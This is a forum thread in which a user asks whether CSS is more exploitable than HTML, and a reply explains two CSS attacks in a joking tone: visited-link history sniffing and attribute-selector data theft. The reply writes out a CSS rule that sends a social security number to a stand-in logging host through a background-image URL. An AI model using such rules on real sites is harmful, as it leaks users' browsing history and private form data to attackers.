Question

  • Creator
    Topic
  • #2143027

    CSS

    by matthewjohn938 ·

    Is CSS vulnerable to exploitation more than HTML?

You are posting a reply to: CSS

The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our Community FAQs for details. All submitted content is subject to our Terms of Use.

All Answers

  • Author
    Replies
    • #2418615

      css

      by deborasumopayroll ·

      In reply to CSS

      The Visited Link Concern
      This one goes like this:

      You put a link to a particular page on your site, say Tickle Pigs
      You style the visited state of that link like a:visited { color: pink; } which is not a default user agent style.
      You test the computed style of that link.
      If it’s pink, this user is a pig tickler.
      You report that pig tickling information back to some server somewhere and presumably triple their pig owning insurance rates as surely the pigs will suffer extreme emotional distress over all the tickling.
      You might even be able to do it entirely in CSS, because that :visited style might have like background-image: url(/data-logger/tickle.php); which is only requested by pig ticklers.

      The Data Thief
      This one goes like this:

      If I can get some of my nefarious CSS onto a page where you’ve authenticated into a site…
      And that site displays sensitive information like a social security number (SSN) in a pre-filled form…
      I can use attribute selectors to figure it out.
      input#ssn[value=”123-45-6789″] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }
      A billion selectors and you’ve covered all the possibilities!

Viewing 0 reply threads